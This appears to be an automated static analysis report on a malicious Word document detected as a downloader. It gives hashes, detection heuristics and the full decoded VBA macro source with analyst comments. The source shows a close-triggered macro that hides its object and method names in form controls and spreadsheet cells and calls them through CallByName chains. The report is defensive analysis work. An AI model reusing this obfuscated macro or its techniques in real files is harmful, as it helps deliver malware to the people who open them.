Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c9185a9e9c273113…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 83.3 KB
Created: 2021-01-29 10:24:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 322e9656044ca59f10ab2faa5b78c4f4
SHA-1: 22d123f8d5f76eba38cdb54b29645b04ab870c97
SHA-256: c9185a9e9c2731130c999ec704dab0d13009de00f8a636894e4ee78e154f95aa
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML (medium, OOXML_VBA, 2 related findings)
    Document contains a VBA project — VBA macros present
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set rs = CreateObject(UserForm1.p3 & UserForm1.oc)
  • CallByName call (high, OLE_VBA_CALLBYNAME)
    Matched line in script:
    Set nw = CallByName(rs.Workbooks, UserForm1.ic & UserForm1.pw, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6839 bytes
SHA-256: f796c2b7833f935b217784d1d57bdcc31db88119a15ae22e06aeb64453f38b66
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ln, fe, q8, kc, lx, rs, dlo, kt, ds6, ig, iy, bu, ij, fhn, i1, lk

' Entry point: fires when the document is closed, after the user has finished with it.
Sub Document_Close()
    b3u
End Sub

Sub b3u()
    On Error Resume Next
    UserForm2.ComboBox1.ListIndex = 5
    ' ProgID is assembled from UserForm1 control values (the OLE_VBA_CREATEOBJ match above).
    Set rs = CreateObject(UserForm1.p3 & UserForm1.oc)
    rs.DisplayAlerts = False
    p4 = 1301
    q0 = 0
    Err.Number = 0
    ' Retry loop (q0 = 0, 16: two attempts) around the OLE_VBA_CALLBYNAME match; the method
    ' name and its first argument again come from form controls rather than string literals.
    While p4 <> 0 And q0 < 32
        Set nw = CallByName(rs.Workbooks, UserForm1.ic & UserForm1.pw, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
        p4 = Err.Number
        q0 = q0 + 16
    Wend
    ' On failure, re-invoke b3u after a delay (2 s via a second CreateObject'd host tw, or 17 s via Application).
    If p4 <> 0 Then
        fpm = UserForm2.ComboBox3
ErrHandler:
        e4 = CallByName(Application, UserForm1.ke & UserForm1.bn, 2)
        If e4 <> False Then
            Set tw = CreateObject(UserForm1.d0u & UserForm1.f9)
            CallByName tw.Documents, UserForm1.ic & UserForm1.pw, 1, ActiveDocument.FullName, , True
            CallByName tw, UserForm1.ih & UserForm1.cg, 1, Now + TimeSerial(0, 0, 2), UserForm1.a & UserForm1.ql & "b3u"
        Else
            a5 = UserForm2.ComboBox8
            CallByName Application, UserForm1.ih & UserForm1.cg, 1, Now + TimeSerial(0, 0, 17), UserForm1.a & UserForm1.ql & "b3u"
        End If
        rs.Quit
        Exit Sub
    End If
    Dim g8
    Set g8 = rs.sheets(1)
    mss = "'"
    r8 = UserForm2.ComboBox28
    lk = rs.sheets(5).Cells(1, 1)
    If Len(lk) < 1 Then
        If rs.ActiveWorkbook.Title <> "Google" Then
            GoTo ErrHandler
        Else
            Exit Sub
        End If
    End If
    ' Object names, method names and arguments for the CallByName calls below are read from workbook cells.
    jp = g8.Cells(94, 28).Value
    l2 = g8.Cells(106, 10).Value
    ig = g8.Cells(6, 39).Value
    iy = rs.sheets(2).Cells(37, 27).Value
    lx = rs.sheets(2).Cells(22, 2).Value
    vpe = rs.sheets(2).Cells(14, 52).Value
    vc = rs.sheets(1).Cells(101, 9).Value
    fk = rs.sheets(3).Cells(54, 34).Value
    kh = rs.sheets(2).Cells(139, 2).Value
    zio = UserForm2.ComboBox14
    x = g8.Cells(138, 35).Value
    ij = rs.sheets(2).Cells(73, 8).Value
    i2 = UserForm2.ComboBox20
    dlo = g8.Cells(124, 7).Value
    ds6 = rs.sheets(3).Cells(36, 1).Value
    hm = rs.sheets(3).Cells(4, 18).Value
    egj = rs.sheets(2).Cells(139, 50).Value
    bu = g8.Cells(56, 4).Value
    m19 = UserForm2.ComboBox16
    zj = g8.Cells(7, 54).Value
    ID = rs.sheets(2).Cells(146, 20).Value
    ln = rs.sheets(3).Cells(27, 18).Value
    ot = rs.sheets(3).Cells(69, 40).Value
    k4 = rs.sheets(1).Cells(118, 55).Value
    kt = rs.sheets(3).Cells(63, 12).Value
    fe = rs.sheets(3).Cells(76, 27).Value
    hp = rs.sheets(3).Cells(116, 41).Value
    y5 = UserForm2.ComboBox5
    k1v = rs.sheets(2).Cells(37, 1).Value
    i1 = ""
    Set Sh1 = rs.sheets(4)
    q7 = 1
    nr = UserForm2.ComboBox18
    ch = True
    yaf = UserForm2.ComboBox20
    ' Concatenate column A of sheet 4 into i1 until the first empty cell.
    While ch
        d2 = Sh1.Cells(q7, 1).Value
        If Len(d2) < 1 Then
            ch = False
        Else
            i1 = i1 & d2
        End If
        q7 = q7 + 1
    Wend
    mw = CallByName(rs, x, 2)
    UserForm1.br.Value = vc & mw & ID
    UserForm1.n6.Value = l2
    g4 = UserForm2.ComboBox24
    CallByName CreateObject(k1v), k4, 1, UserForm1.br, zj, UserForm1.n6
    Set n = CreateObject(jp)
    jo = UserForm2.ComboBox24
    Set m8 = CallByName(n, vpe, 2)
    Set km = CallByName(m8, hp, 1)
    Set ds6 = CallByName(n, ds6, 2)
    Set kc = n
    ' Assigning the form controls triggers the UserForm3/4/5 Initialize handlers below, which hold the remaining CallByName chain.
    UserForm5.ComboBox1 = "sh"
    Set ln = CallByName(fhn, ln, 2)
    kt = CallByName(ln, kt, 2)
    UserForm1.hd.Value = ot & fk
    UserForm3.ComboBox1 = kh
    Z = UserForm2.ComboBox18
    UserForm1.hd.Value = hm
    UserForm4.ComboBox1 = UserForm3.ComboBox1
    UserForm3.ComboBox1 = kt
    ' Trailing assignments from undeclared names (gh, m3, ...) set the variables to Empty; they are padding with no effect.
    n = gh
    jr = UserForm2.ComboBox9
    nw = m3
    g8 = af
    m8 = ol
    km = al
    ds6 = tn
    sm = UserForm2.ComboBox28
    ig = qr
    iy = ys
    fhn = h6
    m4 = UserForm2.ComboBox24
    ln = ob
    a6e = UserForm2.ComboBox17
    kc = ld
    DoEvents
    CallByName rs, egj, 1
    rs = fz
    jc = UserForm2.ComboBox22
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E7F992BE-EF11-484B-BF76-D6EADBCD8076}{B0430367-2CDD-444C-A287-F20B1CD9C619}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{33F60D31-7078-4C73-975E-D91F5FB37647}{889B7B8B-9B53-47D8-8986-97CFB55FF8B3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    urv = UserForm2.Controls.Count - 1
    cb = UserForm2.ComboBox24
    ' rg is the concatenation of every second control on this form.
    rg = ""
    For j2 = 1 To urv Step 2
        rg = rg & UserForm2.Controls.Item(j2)
    Next
    ' Item index 5 (the one b3u selects with ListIndex = 5) is rg; the other entries are decoys.
    ComboBox1.AddItem "f8"
    ComboBox1.AddItem "zg"
    ComboBox1.AddItem "ei"
    ComboBox1.AddItem "ed"
    ComboBox1.AddItem "i3"
    ComboBox1.AddItem rg
    ComboBox1.AddItem "gz"
    wfo = UserForm2.ComboBox11
    xjs = UserForm2.ComboBox13
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{50EA7CA5-8300-45C7-9FCA-2629CBC1A428}{6C41E9F5-811B-4196-AC53-C684CEAC0583}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ln, ActiveDocument.dlo, VbMethod, 1, ActiveDocument.kt
 CallByName ActiveDocument.ln, ActiveDocument.fe, VbMethod, UserForm1.hd.Value
End Sub

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{50C8B40B-55F9-4282-882C-D57365823225}{CA98DDFD-370E-417E-B6EC-9A258FE0ADC0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.kc, ActiveDocument.lx, VbMethod, UserForm1.hd.Value, ActiveDocument.i1, ActiveDocument.lk
End Sub

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{AA98CE11-9F9D-4ECA-8186-53A3BB29C65B}{14256426-AAC9-426A-8ADB-252A1946AD4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ig = CallByName(ActiveDocument.ds6, ActiveDocument.ig, VbGet)
 Set ActiveDocument.iy = CallByName(ActiveDocument.ig, ActiveDocument.iy, VbGet)
 Set ActiveDocument.fhn = CallByName(ActiveDocument.iy, ActiveDocument.bu, VbMethod, ActiveDocument.ij)
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 50688 bytes
SHA-256: 12f2377c5673f496b1725df4719bf6457de6cf9323bceb82b7c84ed1da240f1c
Detection: ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely